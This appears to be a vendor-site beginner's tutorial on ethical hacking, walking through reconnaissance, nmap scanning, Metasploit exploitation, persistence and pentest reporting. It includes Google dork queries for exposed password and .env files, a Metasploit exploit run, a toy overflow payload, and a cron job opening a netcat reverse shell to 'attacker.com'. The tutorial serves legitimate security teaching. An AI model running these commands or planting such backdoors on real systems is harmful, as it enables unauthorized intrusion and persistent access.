Ethical Hacking Explained — Beginner's Guide
Ethical hacking is the authorized practice of probing systems for vulnerabilities to identify and fix security weaknesses before malicious attackers can exploit them.
What You’ll Learn
By the end of this tutorial, you’ll understand the five phases of ethical hacking, learn basic nmap scanning techniques, grasp Metasploit concepts, and know how to write a professional penetration testing report.
Why Ethical Hacking Matters
Every major tech company employs ethical hackers. In 2025, bug bounty programs paid out over $100 million to ethical hackers worldwide. At DodaTech, our security team uses ethical hacking techniques to test Durga Antivirus Pro and Doda Browser before each release. Understanding ethical hacking helps you think like an attacker so you can defend more effectively.
Ethical Hacking Learning Path
flowchart LR
A[Security Basics] --> B[Network Security]
B --> C[Web Security]
C --> D[Cryptography]
D --> E[Ethical Hacking]
E --> F[Pen Testing]
E --> G{You Are Here}
style G fill:#f90,color:#fff
What Is Ethical Hacking? (The “Why” First)
Think of ethical hacking like hiring someone to try to break into your house so you can fix the weak spots. A regular burglar breaks in to steal. An ethical hacker breaks in (with permission) to show you how they did it so you can improve your locks, alarms, and cameras.
The key difference between ethical and malicious hacking is authorization. Ethical hackers:
- Get written permission before testing
- Follow a defined scope (what to test, what not to test)
- Report all findings to the organization
- Never exploit vulnerabilities beyond what’s necessary to prove the risk
- Destroy all data collected during testing
The Five Phases of Ethical Hacking
flowchart LR
A[Reconnaissance] --> B[Scanning]
B --> C[Gaining Access]
C --> D[Maintaining Access]
D --> E[Reporting]
A --> F{Phase 1}
B --> G{Phase 2}
C --> H{Phase 3}
D --> I{Phase 4}
E --> J{Phase 5}
style F fill:#f90,color:#fff
style G fill:#f90,color:#fff
style H fill:#f90,color:#fff
style I fill:#f90,color:#fff
style J fill:#f90,color:#fff
Phase 1: Reconnaissance (Information Gathering)
Reconnaissance is the research phase. You’re gathering information about the target without directly interacting with their systems. Think of it like a detective gathering clues before approaching a suspect.
Passive Reconnaissance
You gather information from publicly available sources without touching the target’s systems:
# WHOIS lookup — find domain registration info
whois example.com
# DNS enumeration — find subdomains and IP addresses
dig example.com ANY
nslookup example.com
# The Harvester — email and subdomain discovery
theHarvester -d example.com -b google
# Shodan — find exposed devices and services
# (Use the website: shodan.io)What You Can Learn
From passive recon alone, you can discover:
- Employee names and email addresses (LinkedIn, company website)
- Technology stack (Wappalyzer, BuiltWith)
- Subdomains and IP ranges (DNS records)
- Exposed documents and sensitive files (Google dorking)
- Social media presence and employee behavior
Google Dorking — Finding Secrets via Search
Google dorking uses advanced search operators to find exposed information:
# Find exposed password files
site:example.com filetype:txt password
# Find configuration files
site:example.com filetype:env
# Find login pages
site:example.com inurl:admin
# Find exposed directories
intitle:"index of" site:example.comActive Reconnaissance
Now you directly interact with the target but in a non-invasive way:
# Ping sweep — find live hosts
ping -c 1 192.168.1.1
# Simple port scan with nc
nc -zv 192.168.1.1 22
nc -zv 192.168.1.1 80Phase 2: Scanning (Finding Open Doors)
Scanning is where you actively probe the target to discover open ports, running services, and potential vulnerabilities. This is the most technical phase and uses specialized tools.
nmap — The Swiss Army Knife of Scanning
# nmap (Network Mapper) is the most popular scanning tool
# Basic scan — check if host is up and scan top 1000 ports
nmap 192.168.1.1
# Scan specific ports
nmap -p 22,80,443 192.168.1.1
# Service version detection — find out which software is running
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Aggressive scan (OS + version + scripts + traceroute)
nmap -A 192.168.1.1
# Scan entire subnet for live hosts
nmap -sn 192.168.1.0/24
# Full scan with all ports (1-65535)
nmap -p- 192.168.1.1Expected nmap output:
Starting Nmap 7.94 ( https://nmap.org ) at 2026-06-06 10:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu
80/tcp open http Apache httpd 2.4.57
443/tcp open https Apache httpd 2.4.57
3306/tcp closed mysql
8080/tcp open http-proxy Squid proxy 6.0
MAC Address: 00:1A:2B:3C:4D:5E (Router Manufacturer)
Device type: general purpose
Running: Linux 5.x
OS details: Linux 5.15 - 5.19Vulnerability Scanning
After discovering services, you check them for known vulnerabilities:
# nmap NSE (Nmap Scripting Engine) — vulnerability scripts
nmap --script vuln 192.168.1.1
# Check for specific vulnerabilities
nmap --script http-sql-injection 192.168.1.1
nmap --script ssl-enum-ciphers 192.168.1.1
# Nikto — web server scanner
nikto -h http://192.168.1.1Phase 3: Gaining Access (The Exploitation Phase)
Exploitation is where you actually break in. This is the most technical and most regulated phase. Only attempt this on systems you own or have explicit permission to test.
Metasploit — The Exploitation Framework
Metasploit is like a toolkit for building and running exploits. Think of it as a library of pre-built “lock picks” for various security vulnerabilities.
# Start Metasploit console
msfconsole
# Once inside msfconsole:
msf6 > search apache
# Select an exploit module
msf6 > use exploit/multi/http/apache_normalize_path
# View options
msf6 exploit(apache_normalize_path) > show options
# Set target
msf6 exploit(apache_normalize_path) > set RHOSTS 192.168.1.1
msf6 exploit(apache_normalize_path) > set RPORT 80
# Run the exploit
msf6 exploit(apache_normalize_path) > runWhat Happens During Exploitation
- Metasploit sends a specially crafted payload to the target
- If the target is vulnerable, the payload executes
- A connection is established (called a “shell” or “meterpreter”)
- The attacker can now execute commands on the target
# Conceptual example of what an exploit payload does
# THIS IS FOR EDUCATIONAL PURPOSES ONLY
import socket
def exploit_concept(target_ip, target_port):
"""Conceptual demonstration of sending a payload."""
payload = b"A" * 200 + b"\x90\x90\x90" # Overflow + NOP sled
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.send(payload)
response = sock.recv(4096)
print(f"Response: {response}")
sock.close()Phase 4: Maintaining Access (Persistence)
Once you’ve gained access, maintaining access ensures you can return. In ethical hacking, this phase demonstrates how attackers establish persistence — backdoors, cron jobs, and hidden accounts.
Common Persistence Techniques
- Backdoors: A program that listens on a port and provides access
- Cron jobs: Scheduled tasks that periodically reconnect
- SSH keys: Adding an authorized key for permanent access
- Web shells: A script on the web server that accepts commands
# Linux backdoor via cron job (conceptual)
echo "*/5 * * * * nc -e /bin/bash attacker.com 4444" > cronjob
crontab cronjob # This runs every 5 minutesPhase 5: Reporting (The Most Important Phase)
Reporting is what separates ethical hackers from malicious ones. A professional report documents every finding with:
- Executive summary — for non-technical stakeholders
- Technical findings — detailed vulnerability descriptions
- Proof of concept — how the vulnerability was exploited
- Risk rating — severity of each finding
- Remediation steps — how to fix each issue
Sample Report Structure
# Penetration Test Report
Client: Example Corp
Date: June 2026
Tester: Jane Doe, Ethical Hacker
## Executive Summary
Example Corp's web application has 3 high-severity and 5 medium-severity
vulnerabilities. The most critical is an SQL injection in the login form
that allows full database access.
## Critical Findings
### Finding 1: SQL Injection in Login Form
- **Severity**: Critical (CVSS 9.8)
- **Location**: /login endpoint, username parameter
- **Impact**: Full database read/write access
- **Proof**: [screenshots and request logs]
- **Remediation**: Use parameterized queries (see Web Security tutorial)
## Methodology
- External black-box testing
- Tools: nmap, Burp Suite, Metasploit, custom scripts
- Duration: 5 daysCommon Ethical Hacking Mistakes
1. Testing Without Permission
Never test a system without explicit written authorization. This is illegal and can result in criminal charges. Always get a signed scope of work document.
2. Going Beyond Scope
If the contract says “test the web application,” don’t test the employee Wi-Fi or the CEO’s laptop. Stick to the agreed boundaries.
3. Not Documenting Everything
If you didn’t document it, it didn’t happen. Keep detailed notes of every command, every finding, and every result. Screenshots are essential.
4. Using Every Exploit Without Understanding
Running exploits without understanding them can crash systems. Know what each exploit does before running it. This is why tools like Metasploit include descriptions and risk ratings.
5. Not Securing Testing Data
The data you collect during testing (passwords, personal information, system configs) is sensitive. Encrypt it, store it securely, and destroy it after the report is delivered.
6. Ignoring Web Application Testing
Many ethical hackers focus on network scanning and miss the most common attack vector — web applications. Always test both network and application layers.
7. Poor Communication
If a critical vulnerability is found during testing, don’t wait for the final report. Notify the client immediately so they can start fixing it.
Common Mistakes Beginners Make
1. Skipping the Fundamentals
Many beginners jump straight to advanced topics without mastering the basics. Take time to understand the core concepts before moving on.
2. Not Practicing Enough
Reading tutorials without writing code leads to shallow understanding. Code along with every example and experiment on your own.
3. Ignoring Error Messages
Error messages tell you exactly what went wrong. Read them carefully — they usually point to the line and type of issue.
4. Copy-Pasting Without Understanding
It’s tempting to copy code from tutorials, but typing it yourself and understanding each line builds real skill.
5. Giving Up Too Early
Every developer hits frustrating bugs. Take breaks, ask for help, and remember that struggling is part of learning.
Practice Questions
1. What’s the difference between ethical and malicious hacking?
Ethical hacking is authorized, follows a defined scope, and produces a report to help improve security. Malicious hacking is unauthorized and aims to cause harm or personal gain.
2. What information can you gather during passive reconnaissance?
Domain registration details, DNS records, employee email addresses, technology stack, subdomains, exposed documents, and social media information.
3. What does nmap -sV do?
It performs service version detection — identifying which specific software versions are running on open ports (e.g., Apache 2.4.57 instead of just “HTTP”).
4. What is Metasploit used for?
Metasploit is a framework for developing and executing exploit code against remote targets. It includes thousands of pre-built exploits, payloads, and auxiliary modules.
5. Challenge: Run a simple nmap scan on your local machine or router and identify three open ports.
nmap localhost
# Expected output will vary, but common open ports include:
# 22/tcp (SSH), 80/tcp (HTTP), 443/tcp (HTTPS)Real-World Task: Network Reconnaissance Lab
Create a safe scanning lab environment:
# Set up a test target using Docker
docker run -d --name vulnerable-web -p 8080:80 vulnerables/web-dvwa
# Scan your test target
nmap -sV -p 80 localhost
# Expected output:
# PORT STATE SERVICE VERSION
# 80/tcp open http Apache httpd 2.4.57
# Now scan with vulnerability scripts
nmap --script http-vuln* -p 80 localhostThis lab setup gives you a legal environment to practice. The DVWA (Damn Vulnerable Web Application) container is intentionally vulnerable and designed for learning. Durga Antivirus Pro uses similar scanning techniques in its network protection module to detect vulnerable services on connected devices.
FAQ
Try It Yourself
Write a Python script that performs a basic port scan (like a simplified nmap):
# simple_port_scanner.py
# ONLY use on systems you own or have permission to test!
import socket
import sys
def scan_port(host, port, timeout=1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
result = sock.connect_ex((host, port))
sock.close()
if result == 0:
try:
service = socket.getservbyport(port, "tcp")
except:
service = "unknown"
return True, service
return False, None
except Exception as e:
return False, str(e)
def main():
if len(sys.argv) < 3:
print("Usage: python scanner.py <host> <port1,port2,...>")
print("Example: python scanner.py scanme.nmap.org 22,80,443")
sys.exit(1)
host = sys.argv[1]
ports = [int(p) for p in sys.argv[2].split(",")]
print(f"[*] Scanning {host} for {len(ports)} port(s)...")
print(f"{'Port':<8} {'State':<8} {'Service'}")
print("-" * 30)
for port in ports:
is_open, service = scan_port(host, port)
state = "OPEN" if is_open else "CLOSED"
svc = service if service else "-"
print(f"{port:<8} {state:<8} {svc}")
if __name__ == "__main__":
main()Expected output:
[*] Scanning scanme.nmap.org for 3 port(s)...
Port State Service
------------------------------
22 OPEN ssh
80 OPEN http
443 CLOSED -What’s Next
What’s Next
Congratulations on completing this Ethical Hacking tutorial! Here’s where to go from here:
- Practice daily — Consistency is more important than long study sessions
- Build a project — Apply what you learned by building something real
- Explore related topics — Check out other tutorials in the same category
- Join the community — Discuss with other learners and share your progress
Remember: every expert was once a beginner. Keep coding!
Built by the developers of DodaTech
Doda Browser, DodaZIP & Durga Antivirus Pro